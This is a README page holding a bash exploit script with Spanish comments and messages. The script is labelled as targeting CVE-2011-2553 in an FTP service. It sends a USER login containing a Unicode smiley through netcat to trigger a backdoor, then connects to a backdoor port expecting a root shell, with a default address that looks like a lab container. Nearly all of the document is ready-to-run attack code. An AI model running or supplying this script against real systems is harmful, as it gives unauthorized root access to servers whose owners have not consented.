README.md
Rendering markdown...
#!/bin/bash
# Exploit para CVE-2011-2553 - FTP Service Vulnerability
# Uso: ./exploit.sh <IP> [puerto_ftp] [puerto_backdoor]
IP=${1:-172.17.0.2}
FTP_PORT=${2:-21}
BACKDOOR_PORT=${3:-5000}
# Colores para output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color
echo -e "${YELLOW}[*] Exploit para CVE-2011-2553 - FTP Service${NC}"
echo -e "${YELLOW}[*] Objetivo: $IP${NC}"
echo -e "${YELLOW}[*] Puerto FTP: $FTP_PORT${NC}"
echo -e "${YELLOW}[*] Puerto Backdoor: $BACKDOOR_PORT${NC}"
echo ""
check_nc() {
if ! command -v nc &> /dev/null; then
echo -e "${RED}[!] Error: netcat no está instalado${NC}"
echo "Instala con: apt-get install netcat"
exit 1
fi
}
exploit_ftp() {
echo -e "${YELLOW}[*] Conectando al servicio FTP en puerto $FTP_PORT...${NC}"
# Enviar USER con smiley unicode U+263A
{
echo -e "USER \u263A"
echo "PASS exploit"
echo "QUIT"
} | nc -w 5 $IP $FTP_PORT
if [ $? -eq 0 ]; then
echo -e "${GREEN}[+] Payload enviado al servicio FTP${NC}"
else
echo -e "${RED}[!] Error al conectar con el servicio FTP${NC}"
exit 1
fi
}
connect_backdoor() {
echo ""
echo -e "${YELLOW}[*] Intentando conectar a la backdoor en puerto $BACKDOOR_PORT...${NC}"
echo -e "${GREEN}[+] Si la explotación fue exitosa, deberías tener shell root${NC}"
echo -e "${YELLOW}[*] Conectando...${NC}"
echo ""
nc -w 5 $IP $BACKDOOR_PORT || echo -e "${RED}[!] No se pudo conectar a la backdoor${NC}"
}
main() {
echo -e "${YELLOW}[*] Iniciando explotación...${NC}"
check_nc
exploit_ftp
echo -e "${YELLOW}[*] Esperando 2 segundos...${NC}"
sleep 2
connect_backdoor
}
trap 'echo -e "\n${RED}[!] Explotación interrumpida${NC}"; exit 1' INT TERM
if [ $# -eq 0 ]; then
echo -e "${YELLOW}[*] Uso: $0 <IP> [puerto_ftp] [puerto_backdoor]${NC}"
echo -e "${YELLOW}[*] Ejemplo: $0 172.17.0.2 21 5000${NC}"
echo -e "${YELLOW}[*] Ejemplo: $0 172.17.0.2${NC}"
exit 1
fi
main